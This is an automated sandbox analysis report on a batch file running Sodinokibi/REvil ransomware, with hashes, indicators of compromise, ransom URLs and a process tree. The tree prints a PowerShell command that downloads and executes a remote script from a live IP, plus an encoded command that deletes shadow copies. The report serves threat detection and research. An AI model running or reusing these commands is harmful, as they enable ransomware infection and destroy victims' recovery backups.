Analysis
-
max time kernel
146s -
max time network
153s -
platform
windows7_x64 -
resource
win7v200217 -
submitted
16-03-2020 15:10
Static task
static1
Behavioral task
behavioral1
Sample
ePwu3qhG.bat
Resource
win7v200217
Behavioral task
behavioral2
Sample
ePwu3qhG.bat
Resource
win10v200217
General
-
Target
ePwu3qhG.bat
-
Size
195B
-
MD5
aaa7b25a5b6939e0c9f77a1d8c141ff1
-
SHA1
9a68e6ebd88ee65a64c80eabd25057e8b1f7a0c3
-
SHA256
d03a1ed079e497d770b0661e81fe675fe379107ec06f75ce916466d2026b9310
-
SHA512
bc6ac64ddfeeed68bb844d913716f47f951b488d2a509993e73202577b72b129d4c725baeb5fc5bf191c97a4cb8b90d319ed23b8c9056eeb9d9d5d34acd0976e
Malware Config
Extracted
http://185.103.242.78/pastes/ePwu3qhG
Extracted
C:\v65g0-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D19FCC29AFE4E52C
http://decryptor.cc/D19FCC29AFE4E52C
Signatures
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1880 powershell.exe Token: SeDebugPrivilege 1880 powershell.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeBackupPrivilege 1500 vssvc.exe Token: SeRestorePrivilege 1500 vssvc.exe Token: SeAuditPrivilege 1500 vssvc.exe -
Blacklisted process makes network request 83 IoCs
Processes:
powershell.exeflow pid process 4 1880 powershell.exe 8 1880 powershell.exe 10 1880 powershell.exe 12 1880 powershell.exe 14 1880 powershell.exe 16 1880 powershell.exe 19 1880 powershell.exe 20 1880 powershell.exe 22 1880 powershell.exe 24 1880 powershell.exe 26 1880 powershell.exe 28 1880 powershell.exe 30 1880 powershell.exe 32 1880 powershell.exe 37 1880 powershell.exe 38 1880 powershell.exe 40 1880 powershell.exe 41 1880 powershell.exe 43 1880 powershell.exe 45 1880 powershell.exe 46 1880 powershell.exe 48 1880 powershell.exe 49 1880 powershell.exe 51 1880 powershell.exe 52 1880 powershell.exe 54 1880 powershell.exe 55 1880 powershell.exe 57 1880 powershell.exe 59 1880 powershell.exe 61 1880 powershell.exe 63 1880 powershell.exe 65 1880 powershell.exe 67 1880 powershell.exe 69 1880 powershell.exe 70 1880 powershell.exe 72 1880 powershell.exe 74 1880 powershell.exe 76 1880 powershell.exe 79 1880 powershell.exe 80 1880 powershell.exe 82 1880 powershell.exe 84 1880 powershell.exe 86 1880 powershell.exe 87 1880 powershell.exe 89 1880 powershell.exe 90 1880 powershell.exe 95 1880 powershell.exe 96 1880 powershell.exe 98 1880 powershell.exe 99 1880 powershell.exe 101 1880 powershell.exe 103 1880 powershell.exe 105 1880 powershell.exe 106 1880 powershell.exe 108 1880 powershell.exe 111 1880 powershell.exe 112 1880 powershell.exe 114 1880 powershell.exe 115 1880 powershell.exe 117 1880 powershell.exe 119 1880 powershell.exe 121 1880 powershell.exe 123 1880 powershell.exe 124 1880 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\yd3i540fab9h6.bmp" powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b1900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd90b000000010000001200000044006900670069004300650072007400000014000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd155090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1856 wrote to memory of 1880 1856 cmd.exe powershell.exe PID 1880 wrote to memory of 1996 1880 powershell.exe powershell.exe PID 1880 wrote to memory of 1996 1880 powershell.exe powershell.exe PID 1880 wrote to memory of 1996 1880 powershell.exe powershell.exe PID 1880 wrote to memory of 1996 1880 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1996 powershell.exe 1996 powershell.exe -
Discovering connected drives 3 TTPs 7 IoCs
Processes:
cmd.exepowershell.exepowershell.exedescription ioc process File opened (read-only) \??\C: cmd.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\E: powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 19 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ConvertToFormat.ini powershell.exe File opened for modification \??\c:\program files\EditRepair.mpv2 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v65g0-readme.txt powershell.exe File opened for modification \??\c:\program files\SkipApprove.xhtml powershell.exe File opened for modification \??\c:\program files\UnpublishSync.aifc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\v65g0-readme.txt powershell.exe File opened for modification \??\c:\program files\ExpandProtect.ods powershell.exe File opened for modification \??\c:\program files\GrantOpen.inf powershell.exe File opened for modification \??\c:\program files\LockBackup.au powershell.exe File opened for modification \??\c:\program files\MoveWait.tif powershell.exe File opened for modification \??\c:\program files\RestartSave.xltm powershell.exe File created \??\c:\program files (x86)\v65g0-readme.txt powershell.exe File opened for modification \??\c:\program files\SplitRestart.bmp powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\v65g0-readme.txt powershell.exe File created \??\c:\program files\v65g0-readme.txt powershell.exe File opened for modification \??\c:\program files\DisableCopy.M2T powershell.exe File opened for modification \??\c:\program files\RestartUninstall.midi powershell.exe File opened for modification \??\c:\program files\SuspendGrant.m4a powershell.exe File opened for modification \??\c:\program files\UnpublishConvertTo.rmi powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ePwu3qhG.bat"1⤵
- Suspicious use of WriteProcessMemory
- Discovering connected drives
PID:1856 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ePwu3qhG');Invoke-HKEJEPZNRMGY;Start-Sleep -s 10000"2⤵
- Drops file in System32 directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Discovering connected drives
- Drops file in Program Files directory
PID:1880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Discovering connected drives
PID:1996
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1500